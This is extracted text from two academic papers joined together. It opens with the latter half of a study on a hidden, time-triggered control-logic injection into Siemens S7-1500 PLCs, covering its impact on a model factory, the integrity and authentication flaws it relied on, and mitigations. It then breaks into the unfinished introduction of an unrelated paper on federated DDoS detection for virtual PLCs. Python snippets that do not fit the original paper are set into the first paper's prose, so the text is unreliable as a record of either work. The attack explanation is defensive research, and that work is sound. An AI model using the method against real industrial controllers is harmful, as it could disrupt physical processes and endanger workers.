The default process cycle begins with storing and identifying the material i.e., workpiece. The factory has an integrated NFC tag sensor storing production data that can be read out via an RFID NFC module. This allows the user to trace the workpieces digitally. The cloud displays the part s colour and its ID-number. Af- terwards, the vacuum gripper places suction on the material and transports it to the high bay warehouse which applies a rst-in rst-out principle for the outsourcing. All goods that were stored could be ordered again online using a dashboard. The desired product and the corresponding color are selected by the user, and then placed in the shopping cart. The suction gripper passes the workpiece from one step to the next, and then moves back to the sorting system once the production is complete. The sorting system receives the allocation com- mand as soon as the color sorter detects the proper color. The material is sorted using pneumatic cylinders. Finally the production data is written on the material at the end of the production process, and the nished product will be provided for collection. B. IMPLEMENTATION In our experiment, we found that the vacuum suction gripper (VGR) is involved in all the industrial processes that the Fis- chertechnik system operates. Therefore, if we could disrupt its functionality, then the entire system would be impacted. The VGR module moves with the help of 8 mini motors: vertical motor up (%Q2.0), vertical motor down (%Q2.1), hor- izontal motor backwards (%Q2.2), horizontal motor forwards (%Q2.3), turn motor clockwise (%Q2.4), turn motor anti- clockwise (%Q2.5), compressor (%Q2.6), and valve vacuum (%Q2.7). Therefore, for exploiting the VGR, we programmed our OB10 to force all the 8 motors to switch off at the point zero for the attack as shown in Fig. 13. After patching the PLC with our malicious block, and be- fore the Time-of-Date interrupt being activated, we did not record any physical impact and the Fischertechnik system keeps operating normally. Once the CPU clock matches the attack time that we set, we noticed that the VGR module stopped moving. Furthermore, the workpiece that is being transported by the gripper has fallen down, as the compressor, which provides the appropriate air ow to carry the good, 158 VOLUME 3, 2022 FIG. 14. Boxplot presenting the measured execution cycle times of OB1. was turned off. This led to an incorrect operation, and the movement sequence of the workpieces was disrupted. For a real-world heavy factory e.g. automobile manufacturing in- dustry, such an attack scenario might be seriously dangerous and even cost human lives. C. EVALUATION To assess the impact of our patch on the physical process controlled by the infected device accurately, we measured and analyzed the differences of the execution cycle times for the control logic program that the PLC runs in three different scenarios:rNormal Operation: before patching the PLC as a base- line.rIdle Attack: after patching the PLC and before the in- terrupt is being activated i.e., the PLC is running the attacker s program.rActivated Attack: after the interrupt is being executed. Siemens PLCs, by default, store the time of the last execution cycle in local variable of OB1 called OB1_PREV_CYCLE . Therefore, we added a small SCL code snippet to our control program which stores the last cycle time in a separate data block. 
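Once the per-cycle values have been read out of that data block, the comparison across the three scenarios can be reproduced with standard tooling. The sketch below assumes the samples have already been exported as three arrays of cycle times in milliseconds; it computes the quartile summary used for the boxplots and applies a Kruskal-Wallis test (Dunn's post-hoc comparison is available in add-on packages such as scikit-posthocs).

```python
# Offline analysis of the exported cycle times (milliseconds): quartile summary
# for the boxplots plus a Kruskal-Wallis H-test across the three scenarios.
import numpy as np
from scipy.stats import kruskal

def summarize(samples_ms):
    q1, q2, q3 = np.percentile(samples_ms, [25, 50, 75])
    iqr = q3 - q1
    return {"Q1": q1, "median": q2, "Q3": q3,
            "whisker_low": q1 - 1.5 * iqr, "whisker_high": q3 + 1.5 * iqr}

def compare(normal, idle_attack, activated_attack):
    summaries = {name: summarize(s) for name, s in
                 (("normal", normal), ("idle", idle_attack), ("activated", activated_attack))}
    h_stat, p_value = kruskal(normal, idle_attack, activated_attack)
    return summaries, h_stat, p_value
```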
Then we recorded 4096 execution cy- cle times for each scenario, calculated the arithmetic median value, and used the Kruskal-Wallis and the Dunn s Multiple Comparison test for statistical analysis. All the results are presented as boxplots in Fig. 14. In order to make our resulting boxplots clearer and easier to read, we de ne the following parameters: 1) First quartile (Q1): represents the middle value (cycle time) between the smallest value and the median of the total recorded values (4096 execution cycle times). 2) Median (Q2): represents the middle value of the total recorded values. 3) Third quartile (Q3): represents the middle value be- tween the highest value and the median of the total values recorded. 4) Interquartile Range (IQR): represents all the values be- tween 25% to 75% of the total recorded values. 5) Maximum: represents Q3 + 1.5*IQR 6) Minimum: represents Q1 - 1.5*IQR7) Outliers: represents all the values that they are higher and lower than the maximum and minimum values re- spectively. Our measurements show that the calculated median value (Q2) of executing the OB1 for the infected program is approx. 38 ms, and differs slightly from the median value of executing the OB1 for the original program which is almost 36 ms. The Q1, and Q3 values for the infected program are as high as 36 ms and 40 ms respectively. They are a bit higher compared to the recorded ones for the original program i.e., 35 ms and 37 ms for Q1 and Q3 respectively. Meaning that, checking the interrupt condition of our malicious block in each execu- tion cycle does not disrupt executing the control logic, and the Fischertechnik system keeps operating normally. Please note that, executing the attacker s program should not exceed the overall maximum execution time of 150 ms. Our mea- surements clearly show that our injection did not trigger this timeout as we recorded a maximum value as high as 47 ms which is still quite small compared to 150 ms. Once the CPU s date and time match the date and time that we set to trigger our attack, the CPU jumps to execute the malicious instruction existing in OB10, and the attack is activated. Our measurements, for this scenario, did not record any higher median values in the execution cycles compared to the prior scenario i.e., when the attack is idle. This is because we set the OB10 to occur only once, so the PLC processes the instructions existing in OB10, and resumes executing OB1 from the last point before the interrupt. But it keeps checking the condition of the interrupt in each cycle as long as OB10 is existing in the control logic program. However, our approach allows attackers to adjust the repeating of the interrupt (see Section III), as well as to program the interrupt block on their will causing different impacts in the physical process of the target system. D. DISCUSSION Based on our analysis, we can conclude that when our patch is in idle mode, the execution cycle times of the infected program are almost as high as the execution times of the orig- inal program. Therefore, the ICS operator would not record any abnormality in executing the control logic as the TIA Portal software will not report any differences before and after the patch. Furthermore, our attack approach always shows VOLUME 3, 2022 159 ALSABBAGH AND LANGEND ERFER: NEW INJECTION THREAT ON S7-1500 PLCS - DISRUPTING THE PHYSICAL PROCESS OFFLINE the original program to the ICS operator, despite the PLC is running a different one. 
This is due to the fact that the original Source Code attribute is always sent back to the TIA Portal whenever the user requires the program from the infected PLC. Due to all that, our attack is capable of staying in the device in idle mode for a long time without being revealed, and the only way to remove it is to re-program the device once again by the ICS Operator. However, in critical facilities and power plants, re-programming the PLCs is not a common case unless there is a certain reason to do so. The success of our attack approach on S7-1500 PLCs is, indeed, based on serious design vulnerabilities in the newest model of S7 PLCs and security issues in the integrity mecha- nism used in the latest version of the S7CommPlus protocol. We found that the PLC does not authenticate the TIA Portal as we expected, and only con rms the session freshness. This allows an external attacker to perform replay attacks against the PLC, keeping in mind that he has always to provide the correct Session_Key in his crafted S7 messages, otherwise the PLC will detect that the expected S7 message received has been modi ed and will refuse to update its program. Siemens claimed that the newest PLCs are resilient against replay attacks, but unfortunately we could maliciously update the PLC s program by sending a crafted S7 download message. Another vulnerability we detected during our investigations is that there is no security pairing between the TIA Portal and the PLC i.e., the PLC does not ensure that the TIA Portal it is currently-communicating with, is the same TIA Portal than in a previous session. This allows an attacker who has a TIA Portal installed on his machine to easily access the PLC without any efforts. Although this holds true as long as the target PLC is not already connected online to the legitimate TIA Portal. Our results showed that an attacker can still com- municate and inject the victim after closing the current session between the TIA Portal and the PLC. It is also noticed that Siemens provides its 1500 CPUs with a sophisticated integrity checking algorithm which checks the validity of any S7 mes- sage received. But unfortunately, this does not hold true for the entire ProgramCycleOB Object. Meaning that, the CPU checks only the integrity of the Object MAC and the Object Code , and has no integrity check for the Source Code . So, if an attacker replaces the Source Code from another session with a new one, the PLC will authenticate the download message and run the attacker s program. This is a signi cant security gap in the design of the integrity mechanism for S7-1500 PLCs, as it keeps the injection hidden inside the memory. E. MITIGATION The fundamental solution would be completely redesigning the integrity check mechanism that the newest S7 PLCs use. The new mechanism should include a security pairing and mutual authentication between the PLC and TIA Portal. But we are aware of the fact that such a solution would also incur an extremely high cost and may have backward compatibility issues. Furthermore, ICS devices are usually not software updated on time, and have a very long life-cycle comparedto common IT devices. For all that, we should expect that insecure devices will keep employed in real-world ICS envi- ronments for a long time. In this term, network detection can be seamlessly integrated into the existing ICS setting. In par- ticular, control logic detection [36], and veri cation [41], [42] can be utilized to alleviate current situation. 
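As one concrete, deliberately minimal illustration of such network-level detection, the sketch below flags any host other than the legitimate engineering stations opening ISO-on-TCP (port 102) connections towards the PLC. Addresses are placeholders, and a production deployment would rather rely on dedicated IDS tooling such as the tools cited in the following; the snippet only shows the shape of the check.

```python
# Minimal sketch of a passive allow-list monitor for engineering traffic:
# any host other than the legitimate TIA Portal talking to the PLC on TCP/102
# is reported. Addresses are placeholders; this is not a substitute for an IDS.
from scapy.all import sniff, IP, TCP

PLC_IP        = "192.168.0.1"
ALLOWED_HOSTS = {"192.168.0.10"}     # legitimate engineering stations
S7_TCP_PORT   = 102

def check(pkt):
    if (pkt.haslayer(IP) and pkt.haslayer(TCP)
            and pkt[IP].dst == PLC_IP
            and pkt[TCP].dport == S7_TCP_PORT
            and pkt[IP].src not in ALLOWED_HOSTS):
        print(f"ALERT: unexpected S7 client {pkt[IP].src} -> {PLC_IP}:{S7_TCP_PORT}")

sniff(filter=f"tcp and dst port {S7_TCP_PORT}", prn=check, store=False)
```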
E. MITIGATION
The fundamental solution would be to completely redesign the integrity check mechanism that the newest S7 PLCs use. The new mechanism should include security pairing and mutual authentication between the PLC and the TIA Portal. We are aware, however, that such a solution would incur an extremely high cost and may raise backward compatibility issues. Furthermore, ICS devices are usually not updated on time and have a very long life cycle compared to common IT devices. For all these reasons, we should expect insecure devices to remain deployed in real-world ICS environments for a long time. In the meantime, network-based detection can be seamlessly integrated into existing ICS settings. In particular, control logic detection [36] and verification [41], [42] can be utilized to alleviate the current situation. Since our injection was hidden in the PLC memory, partitioning the memory space and enforcing memory access control [37] could also be a reasonable solution. Other suggestions include employing standard cryptographic methods such as digital signatures for messages that manipulate control logic (see the signing sketch at the end of this article), as well as using network monitoring tools like Snort [38], ArpAlert [39], and ArpWatchNG [40] to reveal MITM-based attacks. Furthermore, a mechanism that checks the protocol header, which contains information about the type of the payload, is also recommended in order to detect and block any potential unauthorized transfer of control logic. However, from our perspective the best way to prevent injection attacks is to separate the information technology (IT) domain from operational technology (OT) networks by using a Demilitarized Zone (DMZ).
VII. CONCLUSION
This paper presented a new threat against the newest SIMATIC PLCs. Our attack approach is based on injecting the attacker's malicious code once he gains access to the target's network, while activating the patch later without needing to be connected at the time of the attack. Our investigation identified several design vulnerabilities in the new integrity method that the S7-1500 PLCs use. Based on our findings, we successfully conducted an injection attack by patching the tested PLC with a Time-of-Day interrupt block (OB10). This block allows us to activate our patch and disturb the physical process without being connected to the victim at the moment the attack is triggered. We analyzed and evaluated the possibility of the ICS operator revealing our injection. Our experimental results showed that the original control logic program is always shown to the user, whilst the PLC runs the attacker's program. In addition, our injection does not increase the execution times of the control logic; hence, the physical process is not impacted while our patch is in idle mode. To summarize, our attack is a very serious threat targeting ICSs, as attackers need to be online only during the patching and can close all connections to the target's network afterwards. Therefore, they will not be detected even if the ICS operators re-activate the security measures. Finally, we provided some recommendations to secure ICSs against such a severe threat.
Our attack approach is feasible for all S7-1500 PLCs with firmware version 2.9.2 or lower. However, Siemens updated the firmware of all S7-1500 CPUs in December 2021 to the newer version 2.9.4. Therefore, further investigation is required to test the security of the latest firmware version. Furthermore, a deeper analysis of the advanced S7CommPlus protocol, aimed at understanding the private key mechanism that the PLCs implement, could also be part of future work. We believe that, if attackers successfully manage to extract the private key from an S7-1500 PLC, then stronger attacks, e.g., full man-in-the-middle, session hijacking, and PLC impersonation attacks, might become possible for the entire product line.
VIII. APPENDIX: PACKET CAPTURES
FIG. 15. Object MAC Attribute - User Program. FIG. 16. Object Code Attribute - User Program. FIG. 17. Source Code Attribute - User Program. FIG. 18. Object MAC Attribute - Attacker Program. FIG. 19. Object Code Attribute - Attacker Program. FIG. 20. Source Code Attribute - Attacker Program.
REFERENCES
[1] W. Alsabbagh and P. Langendörfer, A fully-blind false data injection on PROFINET I/O systems, in Proc. IEEE 30th Int. Symp. Ind.
Elec- tron., 2021, pp. 1 8. [2] H. Wardak, S. Zhioua, and A. Almulhem, PLC access control: A security analysis, in Proc. World Congr. Ind. Control Syst. Secur. , 2016, pp. 1 6. [3] W. Alsabbagh and P. Langend rfer, A stealth program injection attack against S7-300 PLCs, in Proc. 22nd IEEE Int. Conf. Ind. Technol. , 2021, pp. 986 993. [4] D. Beresford, Exploiting siemens simatic S7 PLCs, in Black Hat USA , 2011, pp. 723 733. [5] W. Alsabbagh and P. Langend rfer, A remote attack tool against siemens S7-300 controllers: A practical report, in 11. Jahreskollo- quium Kommunikation in der Automat. , 2020. [6] J. Klick, S. Lau, D. Marzin, J. Malchow, and V. Roth, Internet-facing PLCs-a new back ori ce, in Black Hat USA , 2015, pp. 22 26. [7] A. Spenneberg, M. Br ggemann, and H. Schwartke, PLC-blaster: A. worm living solely in the PLC, in Black Hat Asia Marina Bay Sands , 2016, pp. 1 16. [8] N. Govil, A. Agrawal, and N. O. Tippenhauer, On ladder logic bombs in industrial control systems, in Proc. Int. Workshop Secur. Ind. Control Syst. Cyber-Physical Syst. , 2018, pp. 110 126. [9] K. Sushma, A. Nehal, Y. Hyunguk, and A. Irfan, CLIK on PLCs! Attacking control logic with decompilation and virtual PLC, in Proc. Netw. Distrib. Syst. Secur. Symp. , 2019, [Online]. Available: https: //ruoyuwang.me/bar2019/pdfs/bar2019- nal74.pdf. [10] W. Alsabbagh and P. Langend rfer, Patch now and attack later exploiting S7 PLCs by time-of-day block, in Proc. 4th IEEE Int. Conf. Ind. Cyber-Phys. Syst. , 2021, pp. 144 151. [11] W. Alsabbagh and P. Langend rfer, A control injection attack against S7 PLCs manipulating the decompiled code, IECON 2021 Proc. 47th Annu. Conf. IEEE Ind. Electron. Soc., Toronto, ON, Canada, Oct., 2021, pp. 1 8. [12] N. Falliere, Exploring Stuxnet s PLC infection process, in Virus Bul- letin Covering Global Threat Landscape Conf. , Sep. 2010, [Online]. Available: http://www.symantec.com/connect/blogs/exploringstuxnet- s-plc-infection-process. [13] Y. Hyunguk and A. Irfan, Control Logic Injection Attacks on Industrial Control Systems . Berlin, Germany: Springer, 2019. VOLUME 3, 2022 161 ALSABBAGH AND LANGEND ERFER: NEW INJECTION THREAT ON S7-1500 PLCS - DISRUPTING THE PHYSICAL PROCESS OFFLINE [14] L. Garcia et al. , Hey my malware knows physics! Attacking PLCs with physical model aware rootkit, Proc. 24th Ann. Netw. Distrib. Syst. Secur. Symp ., 2017, pp. 1 15, doi: 10.14722/ndss.2017.23313 . [15] Z. Basnight et al. , Firmware modi cation attacks on programmable logic controllers, Int. J. Crit. Infrastructure Protection ,v o l .6 , pp. 76 84, 2013. [16] Attackers Deploy New ICS Attack Framework TRITON, and Cause Operational Disruption to Critical Infrastructure . Accessed: Apr. 12, 2021. [Online]. Available: https://www. reeye.com/blog/threat- research/2017/12/attackers-deploy-new-ics-attack-framework- triton.html [17] R. M. Lee, M. J. Assante, and T. Conway, Analysis of the cyber- attack on the ukrainian power grid, Tech. Rep., SANS E-ISAC, Mar. 18, 2016. [Online]. Available at: https://ics.sans.org/media/ESAC_ SANS_Ukraine_DUC_5.pdf [18] S. Senthivel et al. , Denial of engineering operations attacks in in- dustrial control systems, in Proc. 18th ACM Conf. Data Appl. Secur. Privacy , 2018 pp. 319 329. [19] G. liang, S. R. Weller, J. Zhao, F. Luo, and Z. Y. Dong, The 2015 Ukraine blackout: Implications for false data injection attacks, IEEE Trans. Power Syst. , vol. 32, no. 4, pp. 3317 3318, Jul. 2017. [20] N. Falliere, L. O. Murchu, and E. Chien, W32. 
Stuxnet Dossier, Symantec Corp., Security Response, Tempe, AZ, USA, White Paper, 2011. [21] R. Langner, Stuxnet: Dissecting a cyberwarfare weapon, IEEE Secur. Privacy , vol. 9, no. 3, pp. 49 51, May/Jun. 2011. [22] T. De Maizi re, Die Lage Der IT-Sicherheit in Deutschland 2014, The German Federal Of ce for Information Security, German Federal Of ce Inf. Secur. , 2014. [Online]. Avail- able: https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/ Publikationen/Lageberichte/Lagebericht2014.pdf [23] Siemens ProductCERT and Siemens CERT, Security advisory, Pers. commun. , 2019. [Online]. Available: https://new.siemens.com/global/ en/products/services/cert.html [24] IPCS Automation, Market share of different PLCs, 2018, [On- line]. Available: https://ipcsautomation.com/blog-post/market-share- of-different-plcs/ [25] S. Frances, Top 20 programmable logic controller manufacturers, Robotics Automation News , 2020. [Online]. Available: https: //roboticsandautomationnews.com/2020/07/15/top-20-programmable- logic-controller-manufacturers/33153/ [26] Statista Research Department, Programmable logic controllers: Global manufacturer market share 2017, 2021, [Online]. Available: https://www.statista.com/statistics/897201/global-plc-market-share- by-manufacturer/ [27] G. Benmocha, E. Biham, and S. Perle, Unintended features of APIs: Cryptanalysis of incremental HMAC, in Selected Areas in Cryptogra- phy.(Lecture Notes in Computer Science 12804) O. Dunkelman, M. J. Jacobson, Jr, and C. O Flynn, Eds. Berlin, Germany: Springer, 2021. [28] National Institute of Standards and Technology, CVE-2019-10929, National Vulnerability Database, 2019, [Online]. Available: https://nvd. nist.gov/vuln/detail/CVE-2019-10929 [29] T. Wiens, S7comm wireshark dissector plugin, SourceForge , 2011. [Online]. Available: http://sourceforge.net/projects/ s7commwireshark [30] E. Biham, S. Bitan, A. Carmel, A. Dankner, U. Malin, and A. Wool, Rogue7: Rogue engineering-station attacks on S7 simatic PLCs, in Black Hat USA , 2019, [Online]. Available: https://i.blackhat.com/USA19/Thursday/us-19-Bitan-Rogue7-Rogue- Engineering-Station-AttacksOn-S7-Simatic-PLCs-wp.pdf. [31] C. Lei, L. Donghong, and M. Liang, The spear to break the secu- rity wall of S7CommPlus, in Black Hat USA , 2017, [Online]. Avail- able: https://www.blackhat.com/docs/eu-17/materials/eu-17-Lei-The- Spear-ToBreak%20-The-Security-Wall-Of-S7CommPlus-wp.pdf. [32] H. Hui and K. McLaughlin, Investigating current PLC security issues regarding siemens S7 communications and TIA poral, in Proc. Ind. Control Syst. Cyber Secur. Res. , 2018, pp. 67 73. [33] A. Menezes and S. Vanstone, Elliptic curve cryptosystems and their implementation, J. Cryptol. , vol. 6, pp. 209 224, 1993. [34] F. Wei erg, Analysis of the S7CommPlus protocol in terms of cryp- tography used, (in German), Mar. 26, 2018. [Online]. Available: https: //www.os-s.net/publications/thesis/Bachelor_Thesis_Weissberg.pdf [35] A. Ayub, H. Yoo, and I. Ahmed, Empirical study of PLC authentication protocols in industrial control systems, in Proc. IEEE Secur. Privacy Workshops , 2021, pp. 383 397.[36] H. Yoo, S. Kalle, J. Smith, and I. Ahmed, Overshadow PLC to detect remote control-logic injection attacks, in Proc. Int. Conf. Detection Intrusions Malware, Vulnerability Assessment , 2019, pp. 109 132. [37] C. H. Kim et al. , Securing real-time microcontroller Systems through customized memory view switching, in Proc. Netw. Distrib. Syst. Se- cur. Symp. , 2018, doi: 10.14722/ndss.2018.23117 . [38] M. Roesch et al. 
, Snort: Lightweight intrusion detection for networks, Lisa, vol. 99, no. 1, pp. 229 238, 1999. [39] C. H. Kim et al. , Securing real-time microcontroller systems through customized memory view switching, Network Distributed Syst. Secu- rity (NDSS) Symp. , 2018, doi: 10.14722/ndss.2018.23117 . [40] C. Leres et al. , arpwatch Description, KaliTools, 2021, [Online]. Available: https://en.kali.tools/?p=1411. [41] S. Zonouz, J. Rrushi, and S. McLaughlin, Detecting industrial control malware using automated PLC code analytics, IEEE Secur. Privacy , vol. 12, no. 6, pp. 40 47, Nov./Dec. 2014. [42] M. Zhang et al. , Towards automated safety vetting of PLC code in real- world plants, in Proc. IEEE Symp. Secur. Privacy , 2019, pp. 522 538. [43] Siemens, S7-300 CPU 31xC and CPU 31x: Technical speci cations, 2011. [Online]. Available: https://cache.industry.siemens.com/dl/ les/ 906/12996906/att_70325/v1/s7300_cpu_31xc_and_cpu_31x_manual_ en-US_en-US.pdf [44] H. Hui, K. McLaughlin, and S. Sezer, Vulnerability analysis of S7 PLCs: Manipulating the security mechanism, Int. J. Crit. Infrastructure Protection , vol. 35, 2021, Art. no. 100470. [45] S. Mclaughlin, On dynamic malware payloads aimed at programmable logic controllers, in HotSec , 2011, [Online]. Available: http://www. stephenmclaughlin.org/hotsec-2011.pdf. [46] S. McLaughlin and P. McDaniel, SABOT: Speci cation-based payload generation for programmable logic controllers, in Proc. ACM Conf. Comput. Commun. Secur. , 2012, pp. 439 449. [47] A. Serhane, M. Raad, R. Raad, and W. Susilo, PLC code-level vulner- abilities, in Proc. Int. Conf. Comput. Appl. , 2018, pp. 348 352. [48] S. E. Valentine, PLC code vulnerabilities through scada systems, Ph.D. dissertation, Univ. South Carolina, 2013. [Online]. Available: https://scholarcommons.sc.edu/etd/803 [49] Siemens, SIMATIC STEP 7 Basic/Professional V16 and SIMATIC WinCC V16, 2019, [Online]. Available: https: //support.industry.siemens.com/cs/document/109773506/simatic-step- 7-basic-professional-v16-and-simatic-wincc-v16?dti=0&lcn-WW WAEL ALSABBAGH (Member, IEEE) received the B.S. and M.S. degrees in automatic control and computer engineering from Al-baath University, Homs, Syria, in 2012 and 2015, respectively. He is currently working toward the Ph.D. degree in com- puter science with the Technical University of Cot- tbus, Cottbus, Germany. Since 2018, he has been a Scientist with the IHP-Leibniz-Institut f r Innova- tive Mikroelektronik, Frankfurt (Oder), Germany. His research interests include the cyber-attacks and security, mitigation methods of the attacks target- ing industrial control systems, and supervisory control and data acquisition. PETER LANGEND ERFER received the Diploma and Ph.D. degrees in computer science. Since 2000, he has been with the IHP-Leibniz-Institut f r Innovative Mikroelektronik, Frankfurt (Oder), Germany. In the IHP-Leibniz-Institut f r Innova- tive Mikroelektronik, he is leading the Wireless Systems Department. From 2012 to 2020, he was leading the Chair for security in pervasive sys- tems with the Technical University of Cottbus- Senftenberg, Cottbus, Germany. Since 2020, he owns the chair wireless systems with the Technical University of Cottbus-Senftenberg. He has authored or coauthored more than 150 refereed technical articles, led 17 patents of which ten have been granted already. His research interests include security for resource constraint devices, low power protocols, and ef cient implementations of AI means and re- silience. 
He was a Guest Editor of many renowned journals, such as Wireless Communications and Mobile Computing (Wiley) and ACM Transactions on Internet Technology.
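As a follow-up to the digital-signature mitigation suggested in the Mitigation subsection above, the sketch below shows how an engineering station could sign a control-logic download and how the PLC (or a monitor in front of it) could verify it before accepting the program. It is a hypothetical illustration using the Python cryptography package; the key-provisioning step, the program blob, and the function names are assumptions, and nothing here reflects an actual Siemens mechanism.

```python
# Hypothetical digital-signature check for control-logic downloads
# (illustrating the mitigation suggested above); not a Siemens mechanism.
from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey
from cryptography.exceptions import InvalidSignature

# Key pair assumed to be provisioned out of band during commissioning.
engineering_key = Ed25519PrivateKey.generate()
plc_trusted_pubkey = engineering_key.public_key()

def sign_program(program: bytes) -> bytes:
    """Engineering station signs the control-logic blob before download."""
    return engineering_key.sign(program)

def plc_accepts(program: bytes, signature: bytes) -> bool:
    """PLC (or an inline monitor) verifies the signature before accepting."""
    try:
        plc_trusted_pubkey.verify(signature, program)
        return True
    except InvalidSignature:
        return False

legit = b"OB1 + OB10 control-logic blob"             # placeholder program image
sig = sign_program(legit)
print(plc_accepts(legit, sig))                       # True: download accepted
print(plc_accepts(b"attacker-modified blob", sig))   # False: download refused
```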
FedTIU_Securing_Virtualized_PLCs_Against_DDoS_Attacks_Using_a_Federated_Learning_Enabled_Threat_Intelligence_Unit.pdf
Conventional Programmable Logic Controller (PLC) systems are becoming increasingly challenging to manage due to hardware and software dependencies. Moreover, the number and size of conventional PLCs on factory oors continue to increase, and virtualized PLC (vPLC) offers a solution to address these challenges. The utilization of vPLC offers the advantages of streamlining communication between high-level applications and low-level machine operations, enhancing programming ability in process control systems by abstracting control functions from I/O modules, and increasing automation in industrial control networks. Nevertheless, the connection of vPLC to the internet and cloud services presents a considerable cybersecurity risk, and the crucial aspect of information security for vPLCs is ensuring their availability. Distributed Denial of Service (DDoS) attacks can be particularly devastating for vPLCs, as they rely on internet connectivity to function. DDoS attacks on vPLC overwhelm it and causing it to become unavailable. vPLCs manages control systems and if targeted by a DDoS attack, these systems could become unresponsive, leading to signi cant disruption to industrial processes. Thus, implementing effective DDoS protection measures is crucial for ensuring the availability and reliability of vPLCs in industrial settings. Therefore, this work proposes a Federated learning enabled Threat Intelligence Unit (FedTIU) for detecting DDoS attacks on vPLCs on an Edge Compute Stack near to vPLC. The proposed approach involves collaborative model training using federated learning techniques to gain knowledge of new attack patterns from other industrial sites while maintaining data privacy. Index T erms IIoT, Industry 4.0, Federated Learning, DDoS Detection, vPLC I. I NTRODUCTION Industry 4.0 aims to break away from the conventional au- tomation pyramid by closely integrating production and busi- ness levels through cyber-physical systems (CPSs), which con- nect physical and virtual worlds. This integration will enable automation systems to become more exible and intelligent [1]. However, the current industrial landscape is characterized by specialized hardware and software components designed for speci c purposes, resulting in a mix of communication technologies within industrial automation. An instance of this would be Programmable Logic Controllers (PLCs), which have the task of regulating tangible procedures by utilizing The project is funded by Science Foundation of Ireland (SFI) under the Grant 16/RC/3918 and EU s MSCA with agreement Number 847577sensors and actuators to interact with the physical realm. These devices are customized and commissioned for speci c appli- cations and use cases, and also employ proprietary hardware and software, often speci c to the manufacturer, which makes it challenging to integrate different systems and can lead to vendor lock-in [2]. Virtual Programmable Logic Controllers (vPLCs) address the limitations of traditional PLCs by utilizing virtualization technology [3]. With vPLCs, deterministic real-time control is executed on virtualized edge servers, and the cloud provides the comprehensive vPLC management interface. This means that vPLCs are not limited to speci c hardware and can be easily scaled and modi ed based on changing requirements. Thus, vPLCs offer increased exibility, scalability, and cost- effectiveness compared to traditional PLCs. 
As the vPLC solution is cloud-based, it supports the in- tegration of production and business levels and offers in- creased resilience. The VMware Edge Compute Stack (ECS) ef ciently manages resources located at the edge accord- ing to each vPLC s requirements. Furthermore, the complete virtualization of PLC controls utilizing the VMware ECS, which facilitates the operation of Virtual Machines (VM) and containers on standard IT servers at the edge, plays a crucial role in enhancing industrial automation. In summary, vPLCs offer increased exibility, scalability, and cost-effectiveness compared to traditional PLCs. However, Industrial control systems (ICS), including vPLCs are vulnerable to cyberattacks that can have severe con- sequences for critical infrastructure [4]. Attackers aim to compromise vPLC systems by exploiting vulnerabilities in the communication protocols or gaining unauthorized access to one of the systems in the industrial networks. Denial- of-Service (DoS) and Distributed Denial-of-Service (DDoS) attacks [5] are the major threat to the availability of vPLCs, as they can exhaust system resources and cause downtime. Furthermore, the ModBus/TCP , Pro net/IP , DNP3 communi- cation protocol used by vPLCs lacks built-in security features, making it susceptible to attacks that ood the system with TCP SYN requests. Conventional security solutions, such as anti-virus software and intrusion detection systems, are not suitable for safe- guarding vPLCs as a result of their constrained resources. 2332023 IEEE International Conference on Smart Computing (SMARTCOMP) 2693-8340/23/$31.00 2023 IEEE DOI 10.1109/SMARTCOMP58114.2023.000582023 IEEE International Conference on Smart Computing (SMARTCOMP) | 979-8-3503-2281-1/23/$31.00 2023 IEEE | DOI: 10.1109/SMARTCOMP58114.2023.00058 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:27 UTC from IEEE Xplore. Restrictions apply. Furthermore, the effectiveness of existing Machine Learning (ML) and Deep Learning (DL) models for detecting such attacks is limited due to the lack of data available for training the model within the industrial site. Additionally, these isolated models are not equipped to recognize new attack types or variants encountered by other industries, which is critical information as it could potentially affect their industry in the future. Therefore this research work proposes a solution to address DDoS attacks on vPLCs in industrial settings by utilizing Federated Learning (FL). The solution involves a Federated Learning enabled Threat Intelligence Unit (FedTIU) located along with vPLC at the VMware ECS. FedTIU at ECS acts as a gateway for all requests to the vPLC. The FedTIU uses a trained model to classify the request as either an attack or normal, and with FL, the classi cation result can be shared with other clients by utilizing a global model. The rest of the paper is organized as follows: Section 2 describes the background and information related to vPLC and an overview of the existing state-of-the-art techniques. Section 3 presents the attack scenario and section 4 describes the proposed approach against DDoS attack to secure vPLC. Section 5 concludes this work and also discuss about the work in progress for further research. II. B ACKGROUND AND RELA TED WORK This section presents the introduction about vPLC and also discusses the existing state of art techniques present in the literature to handle cyber attacks in ICS. A. 
About vPLC Since the 1970s, PLCs have been ubiquitous in ICS, offering control to autonomously regulate industrial processes. The manufacturing sector commonly employs various PLCs to precisely perform I/O controls. However, every PLC has been a specialized single-purpose hardware component that requires a controller unit, making it a bulky and costly element to host on-site. Moreover, it is also quite costly if needs to be updated once deployed [6]. In recent years, there has been a drive to separate the logic and control functionalities (software) of the PLC from the I/O element (hardware) [3]. This enables the separation of discrete PLCs from the industrial oor and allows the hosting of control functions at the edge (ex. ECS) in the form of vPLCs [7]. Moreover modernization of the industrial automation com- ponents is happening at pace because it is reducing hardware costs by moving to common Information Technology (IT) infrastructure and commodity hardware. It is also improving operational ef ciency and reducing cost by allowing the PLC to be remotely programmed and upgraded, eliminating on-site visits of the PLC programmer. A virtualization approach to the PLC and the ability to remotely program the PLC is enabling agility and operational ef ciency not possible with the current approach.For example, Software De ned Automation is hosting an in- dustrial Control-as-a-Service offering, leveraging IEC 61131-3 automation software that is allowing for the virtualizing of the PLC software logic within a real-time hypervisor [8]. The IT architecture of Control-as-a-Service builds on the cloud computing paradigm, using an on-premise edge compute stack along with network connectivity to the public cloud [9]. Nevertheless, conventional SCADA and the protocols used, such as Modbus/TCP , Pro net/IP , DNP3, etc., play an indispensable role in communication with most PLC devices. Regrettably, most of these protocols do not have security fea- tures nor authentication required to execute remote commands on a control device. Consequently, the vPLC environment is susceptible to cyber-physical attacks. B. State of Art T echniques in ICS In the current state of research, the development of solutions to counter DDoS attacks and other cyber threats against vPLCs is lacking. The relative novelty of vPLCs has not yet drawn signi cant attention from researchers in this area. Nevertheless, there are some existing solutions that have been proposed by researchers to address cyber threats in traditional ICS. DDoS attacks targeting ICS systems have been a topic of research from years back. Teixeira et al. [10] have examined various types of attacks on control systems that concentrate on disrupting communication between sensors/actuators and a PLC. The protection of PLCs from attacks is challenging due to their limited computing power, resulting in limited research on this topic. In a study by Xiao et al. [11], introduced an approach for detecting anomalies in PLCs using power consumption data. However, these existing solutions against attack detection for PLC are not applicable for providing defense against vPLC. Because vPLCs are software-based emulations of physical PLCs, and as such, they have different security concerns and limitations than physical 